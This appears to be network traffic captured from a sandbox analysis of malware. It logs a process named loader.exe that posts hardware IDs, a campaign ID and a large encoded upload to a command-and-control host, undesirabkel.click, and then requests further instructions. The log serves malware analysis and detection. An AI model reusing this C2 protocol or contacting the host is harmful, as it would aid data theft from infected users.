2025-01-05 18:28:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:28:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:09 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WH5Y5RNV963AWZ7N4H User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20444 Host: undesirabkel.click
2025-01-05 18:28:09 UTC	15331	OUT	Data Raw: 2d 2d 57 48 35 59 35 52 4e 56 39 36 33 41 57 5a 37 4e 34 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 43 41 42 43 46 46 30 30 39 46 45 38 42 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 57 48 35 59 35 52 4e 56 39 36 33 41 57 5a 37 4e 34 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 48 35 59 35 52 4e 56 39 36 33 41 57 5a 37 4e 34 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 Data Ascii: --WH5Y5RNV963AWZ7N4HContent-Disposition: form-data; name="hwid"33CABCFF009FE8B76D75A801C764DBB8--WH5Y5RNV963AWZ7N4HContent-Disposition: form-data; name="pid"3--WH5Y5RNV963AWZ7N4HContent-Disposition: form-data; name="lid"LPnhqo--hcjjg
2025-01-05 18:28:09 UTC	5113	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 Data Ascii: `M?lrQMn 64F6(X&7~
2025-01-05 18:28:10 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pbsr12imghb38eo73ch66cojot; expires=Thu, 01 May 2025 12:14:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7Nq%2FfxwFXR3IRTHwkaAn%2BiR5RBUVPs0TRypYK9G%2BRzoeMX1IASR8IohpBwSjkm4rXk9%2FhAWGYNk8HMyJeYAB4u5ic65CN0DKgsno4yZ3aDufhAxSdfbfhhPRxsng8KXacXdkEE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586ca7dae4338-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2096&min_rtt=2081&rtt_var=810&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21408&delivery_rate=1326067&cwnd=193&unsent_bytes=0&cid=625e870675ff8dbd&ts=638&x=0"
2025-01-05 18:28:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:28:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:11 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DLCVYOCL1FE28FIZF3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1286 Host: undesirabkel.click
2025-01-05 18:28:11 UTC	1286	OUT	Data Raw: 2d 2d 44 4c 43 56 59 4f 43 4c 31 46 45 32 38 46 49 5a 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 43 41 42 43 46 46 30 30 39 46 45 38 42 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 44 4c 43 56 59 4f 43 4c 31 46 45 32 38 46 49 5a 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 4c 43 56 59 4f 43 4c 31 46 45 32 38 46 49 5a 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 Data Ascii: --DLCVYOCL1FE28FIZF3Content-Disposition: form-data; name="hwid"33CABCFF009FE8B76D75A801C764DBB8--DLCVYOCL1FE28FIZF3Content-Disposition: form-data; name="pid"1--DLCVYOCL1FE28FIZF3Content-Disposition: form-data; name="lid"LPnhqo--hcjjg
2025-01-05 18:28:11 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=og7arn19q785dio1tngduimrs0; expires=Thu, 01 May 2025 12:14:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vCOpHQcHLAcjRNOPfxrCkFTnQ4T%2F83vpbIJ7mQTNZjiai16WXdWP%2B2HU4cM6AMO5XrY3WvRkEFvDmBdWuZuPMcsN2oZx0M10s8y5ntfbzGipSM%2FVGnVe37nwlvK4%2BPoffx6c%2BB4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586d24e744225-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1718&rtt_var=664&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2205&delivery_rate=1623123&cwnd=235&unsent_bytes=0&cid=635b73e5ff76eecf&ts=472&x=0"
2025-01-05 18:28:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:28:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:12 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y91F1EBD6DJ6IK0NSV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570417 Host: undesirabkel.click
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: 2d 2d 59 39 31 46 31 45 42 44 36 44 4a 36 49 4b 30 4e 53 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 43 41 42 43 46 46 30 30 39 46 45 38 42 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 59 39 31 46 31 45 42 44 36 44 4a 36 49 4b 30 4e 53 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 39 31 46 31 45 42 44 36 44 4a 36 49 4b 30 4e 53 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 Data Ascii: --Y91F1EBD6DJ6IK0NSVContent-Disposition: form-data; name="hwid"33CABCFF009FE8B76D75A801C764DBB8--Y91F1EBD6DJ6IK0NSVContent-Disposition: form-data; name="pid"1--Y91F1EBD6DJ6IK0NSVContent-Disposition: form-data; name="lid"LPnhqo--hcjjg
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: ed f0 20 cf 0c 68 8d f0 1c c2 de 4b 8f 01 5e 79 08 bb 66 b3 7f e3 21 e2 a8 11 6d b7 16 ac 8a 3e 02 b1 94 95 c0 5f c2 9c d2 03 38 e3 2e c0 5a 3e 05 3c 98 2e 30 43 87 c5 96 75 cd a8 ad d6 85 58 0f dd c3 74 00 2b 3b 64 0e e1 68 46 aa d0 e4 ff 6f 27 a5 17 16 24 ae ca c2 03 00 de 47 68 5a 51 02 0a 7d 40 0b 6a 51 99 d1 b6 21 b2 09 3c 24 25 54 66 ba 2c 7e 6b f4 23 f4 f0 0b 77 09 c9 ed 01 f6 38 f4 63 88 3a bd 58 e8 d9 0a 58 25 68 92 a6 07 f0 bd 50 24 a4 07 47 61 89 1e 23 d5 ba b8 5c 9f ea 54 ed 82 93 3f f0 fd 11 72 e8 b6 78 0a 6b be 6f fc de 69 5e da 47 52 58 83 78 4e b7 07 fa 85 bc cd 68 99 14 98 6a a1 54 76 3d a0 3d b8 c3 dc cc 2e e4 73 7c 72 47 c3 7b a6 23 48 cf aa 46 d9 a1 aa 1e fd 4a cd 28 02 46 a6 08 11 5d a6 16 61 01 4a 99 6d 98 dc cb 64 6b 88 ec 14 02 c2 Data Ascii: hK^yf!m>_8.Z><.0CuXt+;dhFo'$GhZQ}@jQ!<$%Tf,~k#w8c:XX%hP$Ga#\T?rxkoi^GRXxNhjTv==.s\|rG{#HFJ(F]aJmdk
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: 31 5d 2e f5 e1 81 47 d2 23 52 c5 f4 07 ab dd 22 f9 4a 18 58 7d 9d 36 69 a9 2e ea a8 2a f0 36 b1 ca ea 8b 65 56 08 7d 13 9a 15 9f 58 71 f7 83 26 ff ec 0a d4 00 02 6c 93 7a b7 4f f8 74 86 3a 87 85 04 a7 32 22 2f 0e 26 2d b8 58 c0 c1 27 b4 08 be 09 f3 d6 2a 95 09 db 98 a1 24 b3 2c 8b 38 03 34 11 c5 79 5c f4 ed 6f 85 d5 1a 49 0f 15 a6 f1 b8 52 fd cd 49 54 7d 69 d9 a6 fe 5c 52 1e c5 5b 70 a7 7a 51 42 95 e1 56 22 9b de 6a 4e f4 c6 e5 95 62 a5 bb ee 87 75 94 66 2f f1 e9 19 a7 72 90 c8 0a 87 91 e4 9e bc cb df 29 df de a2 88 c0 39 ff b9 1f 3f c2 a6 90 3c 3e 73 f6 c3 9f d3 04 26 e5 3a 17 93 50 c4 96 67 d5 bd eb cd b2 c8 7b ea b8 4e b4 08 fd be d6 78 4a 0c 55 7b c4 a1 ad 59 a5 3e 74 17 7b 24 dd 75 95 34 da 80 1a bb 00 ac e3 a9 84 19 c2 b2 cc af f7 c4 93 ae 4e 33 4a Data Ascii: 1].G#R"JX}6i.6eV}Xq&lzOt:2"/&-X'$,84y\oIRIT}i\R[pzQBV"jNbuf/r)9?<>s&:Pg{NxJU{Y>t{$u4N3J
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: f3 32 54 b0 79 94 9a e3 4d 1c 6d ac ba 92 80 b7 97 79 49 4b c0 f1 f7 91 fd e3 e0 2d d3 cc 39 26 21 2a 0e 41 4e 5d 73 7b 45 9d d7 2f 59 c3 7c 50 b0 74 ad 54 07 ad 92 a1 1b 86 f2 72 67 8c ba 4b 5b dc 4a bd b5 51 f4 c2 a7 79 01 ce a3 38 4f e8 4a 60 f2 fd ed 23 8b c5 5d 9d 4b 2e 08 1b fb e8 20 7e 72 cb 1f c1 4a 48 19 4c 15 db f1 87 7b 74 00 99 d6 bd d5 88 d0 49 0d 53 dc ab 9a b2 ad e4 2e 8b 71 b9 a1 dd 5b 25 1e 17 7f 5c 18 52 fe ba 0f 24 54 1f 70 66 bf f7 e9 74 7c ce bf 29 70 52 ec 4f c6 96 f5 9b e2 d9 f0 b6 7f 9a df 8f 84 58 2c c1 9a 64 8a 43 9e e2 a8 e2 0a f5 95 ec f0 9f 1e ca 54 e8 2a 33 86 b7 b6 95 f4 74 44 fc 34 a1 a1 bd b6 ba c8 86 5d 7c 34 ed 70 8c db c1 3d 96 72 56 c3 47 77 82 fe 5c 76 3c b6 7d 85 9f a8 81 c6 19 de 99 7f 73 23 6f 23 68 ab 5c 5c 7f 16 Data Ascii: 2TyMmyIK-9&!AN]s{E/Y\|PtTrgK[JQy8OJ`#]K. ~rJHL{tIS.q[%\R$Tpft\|)pROX,dCT3tD4]\|4p=rVGw\v<}s#o#h\\
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: 90 e5 97 02 9c ed ff 6d 76 b6 c7 34 48 92 4f 1e 49 65 1c 7c 83 fb dd 44 5a 03 c4 47 f0 2e d1 30 87 8f bd 9d ec c9 47 3e 28 65 80 60 ba aa 63 5c 1c 73 e4 9f 15 5a 66 08 84 1b dc 17 cd dd b4 8d c3 6a b0 ce 60 72 ce d3 5e 62 bc 0e cd e7 06 8b 60 07 37 9c 39 99 49 fc c6 bf 64 03 d1 14 d2 ba dd 49 aa e9 a7 8c 34 76 8b 64 58 ef 80 9b 0b 31 7d 4d c0 0b 2b 48 3c 15 f2 9b 89 87 19 1d 87 73 78 fe 8e be 80 0e 10 dd fe 55 c1 2e 6f 49 26 35 71 ac 01 d8 c9 fc c3 25 ae 8b c9 1a cc 4c 8e df e1 86 bc c9 b8 73 e0 42 dc 42 77 bd 75 f2 73 f2 e0 f4 99 4c 53 30 fb c0 58 2d 45 35 2a c2 53 a0 d7 18 cb 29 8f 40 29 d2 66 06 82 4d 18 79 6e ee 07 af 85 93 de c8 c5 ed cc 57 13 86 5d 99 e2 2b fc 27 71 be f4 ef c8 56 86 94 e0 65 0c 27 80 49 41 65 82 ce 69 bf 5a 8c 05 a4 7f 5e c2 4a bc Data Ascii: mv4HOIe\|DZG.0G>(e`c\sZfj`r^b`79IdI4vdX1}M+H<sxU.oI&5q%LsBBwusLS0X-E5*S)@)fMynW]+'qVe'IAeiZ^J
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: 3a 20 0d 6c 71 30 7b 1a 15 07 b7 06 d5 9a 01 b9 0f bf 74 08 09 69 1d f0 3a 08 83 45 ff 41 c4 d6 f8 f3 72 98 dd b2 a5 d5 56 f9 83 34 0c e5 00 06 4c e8 d3 1c 7f 01 45 37 b6 62 35 f0 ea 16 a3 08 07 04 b7 6c 96 43 d7 7f 73 2f 04 8f 7d c9 ca bc 16 7c a4 d9 b9 11 db 9a 75 51 17 bb 71 59 3d d5 0f 7d 8f 3b 48 65 88 b7 35 2f 6a f6 ca e9 9d c7 ba 3b 7a ff 52 0e d1 95 1f 82 ba 71 ec 54 d6 4d 82 10 98 89 25 92 b4 9f 85 75 ff 4f 4b 82 7c a4 dc b3 66 36 df ae f7 ab 2d e5 1c bf b8 48 7e fb 51 83 c9 07 0e b2 e9 20 03 0e 5e ff a9 da ff f1 ed 92 a7 58 95 32 53 c7 fa 5c 8d 34 21 ed 1f 92 16 e7 b2 40 ff ed 7d e3 a4 a6 c8 0f f5 fb 54 92 b0 20 db 5c e6 2c af 49 33 f2 9b 1f 12 69 75 bf 31 ab 00 78 eb 8d d7 7d d4 25 dc 50 b4 ce ac d5 b0 22 09 3f da b2 bc 48 69 d2 46 3e 9e c0 ac Data Ascii: : lq0{ti:EArV4LE7b5lCs/}\|uQqY=};He5/j;zRqTM%uOK\|f6-H~Q ^X2S\4!@}T \,I3iu1x}%P"?HiF>
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: 22 82 bc 87 f5 d4 7c 8a 34 c8 e4 18 a9 f6 c8 76 03 f7 eb 9e 19 fd ef d4 c9 3c 87 4f 61 3c 07 9c 4f 55 5a b6 ad c6 e0 7a 9f 9a be e5 a9 a0 44 3b b3 7f d3 41 8d 1f 4b 70 ae 91 01 ae a3 b0 e3 08 9b 6d 32 20 c9 0a f9 9b 63 89 53 13 78 8c 75 a1 aa 05 80 41 f3 35 39 e8 e2 2b 28 2b 74 e5 58 56 ab 04 d1 03 c1 a3 09 b6 a5 9a 39 c7 b4 c4 c2 15 a4 cf 5d d9 db d2 e2 05 d3 73 b2 4b e1 05 09 f8 d6 66 c6 9f da 84 d6 64 12 27 97 1f 1b a1 a5 07 99 9c e3 22 09 a1 43 4e 8b e5 5c 67 74 e9 ba 88 85 5e 15 da df 5f 7e bd 4e 99 26 d1 0f 15 0b 26 e1 95 61 5d 3c a4 be f3 d7 39 95 c5 f7 e2 2a 27 8f e2 f7 7f ae c0 38 51 68 86 ed 0a 96 d0 e2 b1 ab 2c 0e 19 ae ee 19 a4 99 b9 30 55 8f e7 78 93 c3 aa 09 4d 7f 6c a8 9f 3f dc de 55 76 a0 c0 76 10 86 6d cb 70 57 99 40 be bc d4 e6 c5 68 eb Data Ascii: "\|4v<Oa<OUZzD;AKpm2 cSxuA59+(+tXV9]sKfd'"CN\gt^_~N&&a]<9*'8Qh,0UxMl?UvvmpW@h
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: c7 f1 5c f9 cc 2e 0f f5 e6 0a 36 42 23 8b f3 12 79 22 6a 6b e0 f0 64 e3 a1 db d9 36 1b 2f af 33 f3 af 70 3c b6 9c 73 34 c5 3f 04 76 92 76 d6 03 bf a1 ed 63 68 6e a1 5d 80 9e 04 d9 5c 84 7d 47 d1 cb 79 ce 50 31 df 47 40 ef d9 79 fb 14 b1 52 f4 00 ed 7a aa a4 ac 3b 4d 6d 91 b2 f0 2a c5 83 35 ee 0f 47 08 e6 91 6f 8a cb db b0 cf 44 63 ac c5 30 ad d7 73 a8 ba 23 27 a3 58 2e 30 72 5d 5c 86 23 44 b9 7c 97 85 86 46 23 00 13 81 98 b9 11 ca ca 43 83 cc 7a 49 70 90 75 b2 ba ea 8f 95 8d 4e 0a 0b 2d df 05 72 1d 3e bc bf fa 92 c0 3a 0e 27 df d7 a0 08 c0 78 b6 c8 93 13 0c bb 03 c8 d5 32 88 1e 03 25 42 cc 8b 22 bc 85 71 61 43 9b a0 5a 7d 10 19 76 7d d1 c9 77 e3 52 a2 d3 a1 22 18 5d 9a fb 12 cd 7d 95 bc 76 2a 21 8c 79 e1 68 b7 31 93 b8 bb 9d 4e b2 13 ac 41 2f 74 9c 4f e3 Data Ascii: \.6B#y"jkd6/3p<s4?vvchn]\}GyP1G@yRz;Mm5GoDc0s#'X.0r]\#D\|F#CzIpuN-r>:'x2%B"qaCZ}v}wR"]}v!yh1NA/tO
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: 1c fd 94 66 e2 14 a4 e1 ba 71 6c 8e 64 87 d9 b5 36 71 98 0c 48 b2 39 9b f6 e4 64 38 df 2e e1 de 57 4e be 70 db 03 88 98 b3 94 a7 48 f3 48 1d fa 91 f5 b6 83 25 90 50 7f a1 37 47 05 a1 72 94 7b c7 ea 8c cd 13 06 f9 c0 4e fa b4 45 db 6a a5 2a ea dd 43 56 98 c0 42 84 e0 92 50 da ca 71 e2 ae 95 4b a8 74 47 89 71 3e 9e 59 a9 c9 e9 e6 3c 38 46 ae fc 3a 8c e5 c3 35 3e a1 98 d2 f8 81 6f 6b 5a 2b ec 85 00 6e c1 33 7f 77 2a fa 2d 73 0a 51 c7 26 31 ab d5 f3 d5 fc e7 6f 66 44 b9 6f 14 9d 20 1c 58 c7 a7 84 41 68 be c9 44 7e 02 f5 eb c3 26 25 c4 71 d1 24 0a 16 17 4f e7 49 3b 10 02 18 18 cc cf 03 d1 cb 00 8d f5 f4 80 8d 1f 1b a0 4f ed fa 15 f8 49 4b 95 19 41 bf 48 0f ed ae 35 c6 cd a4 8c d3 f6 e9 6e a2 67 7d ea 9d a8 1b 5f 0c 82 5a 0c a6 d0 1d 21 36 fb 8f d6 e9 bc 4c 28 Data Ascii: fqld6qH9d8.WNpHH%P7Gr{NEjCVBPqKtGq>Y<8F:5>okZ+n3w-sQ&1ofDo XAhD~&%q$OI;OIKAH5ng}_Z!6L(
2025-01-05 18:28:12 UTC	15331	OUT	Data Raw: be 3c e6 47 27 e4 9c f7 47 ed 01 c4 af 0f a3 b0 e0 4f 95 98 63 98 10 ff 61 62 52 6f 0c d9 7f db 27 23 cb 0a ca 6a be c9 0d a1 ea b6 4f 62 01 f1 ef 8b bd 70 c4 0b c5 22 81 e4 bd 5d 1a 55 6c be 6d 45 b0 6b 51 11 1d c3 79 12 c8 8f 72 32 53 9c b4 37 66 26 29 d1 d0 1c c2 7f 0c e0 f9 f7 bb 50 82 5a 54 f9 05 87 b3 85 0d 7e ea 4e dd 94 d8 8c f5 df 83 b7 30 c6 7f a4 ca 73 51 b4 6e b2 7d 9b 33 c5 c8 31 8d 58 28 52 0c fc 4e d3 c8 20 5f 59 a2 ff 1e 49 3a 3a 91 59 c5 92 98 e2 9a 74 1d eb ed 40 5f e6 46 d3 71 08 ac f9 11 7c 07 f7 cc f5 f8 cb f3 46 30 5a 43 13 e0 c6 f1 2e 62 34 b1 58 4c 57 b2 97 b1 a3 30 ec fb df 16 8f d9 68 12 ff 11 79 44 91 99 cd f0 21 8c a0 fc cc aa a2 08 1f 4d 83 8c 8c d2 e3 bc 11 d1 41 2a 22 fa c6 e6 79 5b ed 6e b6 4c 4c d8 74 4f 0e 7a 5e 64 0b 12 Data Ascii: <G'GOcabRo'#jObp"]UlmEkQyr2S7f&)PZT~N0sQn}31X(RN _YI::Yt@_Fq\|F0ZC.b4XLW0hyD!MA*"y[nLLtOz^d
2025-01-05 18:28:15 UTC	1141	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b4b7risla3t58la0ect6n5n2um; expires=Thu, 01 May 2025 12:14:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lqUYlDDF36b245QZ8X88jh3oMSaCN15f3fUbU7b9FiF33tC1%2BGzNMsyRy2DL%2FxHMdNPE37bs4vfn5lg4Nec%2BC0x%2Fmj9xzbgItrg%2FmYoWMGreOoqdgdi6dKiboEv7GDxsE%2BGKE7g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586da6eef5e70-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1619&rtt_var=607&sent=197&recv=589&lost=0&retrans=0&sent_bytes=2845&recv_bytes=572966&delivery_rate=1803582&cwnd=228&unsent_bytes=0&cid=b5c0459df72f9304&ts=3082&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:16 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: undesirabkel.click
2025-01-05 18:28:16 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 6d 70 73 6f 6a 76 66 26 6a 3d 26 68 77 69 64 3d 33 33 43 41 42 43 46 46 30 30 39 46 45 38 42 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--hcjjgmpsojvf&j=&hwid=33CABCFF009FE8B76D75A801C764DBB8
2025-01-05 18:28:16 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7mobh2rfl438fkf9tq7ntidp8u; expires=Thu, 01 May 2025 12:14:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0CqBV1g4MUXzxgeBlp7%2FuD4dDgeMJAlIp4ICtYOR3QUUtNOLe8X%2FPr8vVbWgYjhwYhteCCggtS3Ha186waLSQL8t4TYGi%2BoAFdzy82xgh2B1EULSlrGiX%2FpLQRJ8O3GJydlV%2FE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586f0af07726b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1897&min_rtt=1890&rtt_var=723&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=991&delivery_rate=1498204&cwnd=238&unsent_bytes=0&cid=12ce2c505f5946d4&ts=512&x=0"
2025-01-05 18:28:16 UTC	238	IN	Data Raw: 33 37 31 34 0d 0a 77 78 6d 4d 62 67 49 63 43 6b 42 48 52 49 78 54 2f 6b 32 51 6f 78 4a 67 52 68 2b 4b 35 78 38 37 4e 6b 33 4c 67 53 47 44 4b 72 61 59 59 71 34 49 64 6a 34 77 63 57 74 6d 36 58 48 45 66 4c 79 42 64 6b 4a 38 50 63 37 57 65 33 70 43 42 34 4f 7a 53 4b 67 65 36 75 78 50 35 31 5a 51 51 43 55 4a 41 33 7a 76 4e 35 6f 49 2f 4e 46 33 42 53 39 31 33 6f 4a 52 63 33 67 42 75 4d 4e 79 35 52 76 7a 68 56 72 49 4f 6d 73 73 59 52 41 6d 43 4c 73 35 69 68 72 45 32 31 70 59 49 55 2f 79 6e 79 34 4c 5a 52 71 2f 74 42 66 49 5a 50 6a 32 4b 65 39 65 64 32 74 4d 43 68 74 72 32 51 4b 76 64 4d 6a 79 58 6a 4d 55 4a 75 57 52 61 6d 73 48 46 35 76 45 52 2f 